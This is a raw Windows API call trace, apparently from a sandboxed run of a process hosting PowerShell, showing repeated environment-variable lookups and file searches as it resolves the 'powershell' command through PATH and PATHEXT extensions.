	[0334.147] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.147] CoTaskMemFree (pv=0x2a1760) 
	[0334.149] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.149] CoTaskMemFree (pv=0x2a1760) 
	[0334.151] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.151] CoTaskMemFree (pv=0x2a1760) 
	[0334.156] VirtualQuery (in: lpAddress=0x1c7ae0f0, lpBuffer=0x1c7aefb0, dwLength=0x30 | out: lpBuffer=0x1c7aefb0*(BaseAddress=0x1c7ae000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.889] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.889] CoTaskMemFree (pv=0x2a1760) 
	[0334.891] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.891] CoTaskMemFree (pv=0x2a1760) 
	[0334.891] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.891] CoTaskMemFree (pv=0x2a1760) 
	[0334.892] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.892] CoTaskMemFree (pv=0x2a1760) 
	[0334.896] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.896] CoTaskMemFree (pv=0x2a1760) 
	[0335.410] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0335.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.411] CoTaskMemFree (pv=0x2a1760) 
	[0335.413] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0335.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.413] CoTaskMemFree (pv=0x2a1760) 
	[0335.414] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0335.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.414] CoTaskMemFree (pv=0x2a1760) 
	[0335.416] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0335.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.417] CoTaskMemFree (pv=0x2a1760) 
	[0335.418] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0335.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.418] CoTaskMemFree (pv=0x2a1760) 
	[0335.419] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0335.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.420] CoTaskMemFree (pv=0x2a1760) 
	[0335.421] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0335.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.421] CoTaskMemFree (pv=0x2a1760) 
	[0335.875] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0335.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.876] CoTaskMemFree (pv=0x2a1760) 
	[0336.388] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0336.388] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0336.388] CoTaskMemFree (pv=0x2a1760) 
	[0336.391] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0336.391] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0336.391] CoTaskMemFree (pv=0x2a1760) 
	[0336.391] CoTaskMemAlloc (cb=0x128) returned 0x258e50
	[0336.391] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x258e50, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0336.391] CoTaskMemFree (pv=0x258e50) 
	[0336.396] CoTaskMemAlloc (cb=0x20e) returned 0x2c7400
	[0336.396] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2c7400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0336.396] CoTaskMemFree (pv=0x2c7400) 
	[0336.400] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.401] SetErrorMode (uMode=0x1) returned 0x1
	[0336.404] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.414] SetErrorMode (uMode=0x1) returned 0x1
	[0336.415] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.415] SetErrorMode (uMode=0x1) returned 0x1
	[0336.415] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.830] SetErrorMode (uMode=0x1) returned 0x1
	[0336.831] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.832] SetErrorMode (uMode=0x1) returned 0x1
	[0336.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.840] SetErrorMode (uMode=0x1) returned 0x1
	[0336.841] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.841] SetErrorMode (uMode=0x1) returned 0x1
	[0336.841] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.849] SetErrorMode (uMode=0x1) returned 0x1
	[0336.851] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.851] SetErrorMode (uMode=0x1) returned 0x1
	[0336.851] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.880] SetErrorMode (uMode=0x1) returned 0x1
	[0336.882] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.882] SetErrorMode (uMode=0x1) returned 0x1
	[0336.882] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.282] SetErrorMode (uMode=0x1) returned 0x1
	[0337.283] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.284] SetErrorMode (uMode=0x1) returned 0x1
	[0337.284] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.291] SetErrorMode (uMode=0x1) returned 0x1
	[0337.292] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.293] SetErrorMode (uMode=0x1) returned 0x1
	[0337.293] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.300] SetErrorMode (uMode=0x1) returned 0x1
	[0337.301] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.302] SetErrorMode (uMode=0x1) returned 0x1
	[0337.302] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.309] SetErrorMode (uMode=0x1) returned 0x1
	[0337.310] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.311] SetErrorMode (uMode=0x1) returned 0x1
	[0337.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.318] SetErrorMode (uMode=0x1) returned 0x1
	[0337.319] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.320] SetErrorMode (uMode=0x1) returned 0x1
	[0337.320] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.645] SetErrorMode (uMode=0x1) returned 0x1
	[0337.647] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.647] SetErrorMode (uMode=0x1) returned 0x1
	[0337.647] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.655] SetErrorMode (uMode=0x1) returned 0x1
	[0337.656] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.656] SetErrorMode (uMode=0x1) returned 0x1
	[0337.656] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.664] SetErrorMode (uMode=0x1) returned 0x1
	[0337.665] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.665] SetErrorMode (uMode=0x1) returned 0x1
	[0337.666] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.673] SetErrorMode (uMode=0x1) returned 0x1
	[0337.675] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.675] SetErrorMode (uMode=0x1) returned 0x1
	[0337.675] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.135] SetErrorMode (uMode=0x1) returned 0x1
	[0338.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.136] SetErrorMode (uMode=0x1) returned 0x1
	[0338.136] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.137] SetErrorMode (uMode=0x1) returned 0x1
	[0338.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.137] SetErrorMode (uMode=0x1) returned 0x1
	[0338.137] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.137] SetErrorMode (uMode=0x1) returned 0x1
	[0338.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.138] SetErrorMode (uMode=0x1) returned 0x1
	[0338.138] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.138] SetErrorMode (uMode=0x1) returned 0x1
	[0338.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.138] SetErrorMode (uMode=0x1) returned 0x1
	[0338.138] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.139] SetErrorMode (uMode=0x1) returned 0x1
	[0338.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.139] SetErrorMode (uMode=0x1) returned 0x1
	[0338.139] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.139] SetErrorMode (uMode=0x1) returned 0x1
	[0338.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.140] SetErrorMode (uMode=0x1) returned 0x1
	[0338.140] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.140] SetErrorMode (uMode=0x1) returned 0x1
	[0338.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.140] SetErrorMode (uMode=0x1) returned 0x1
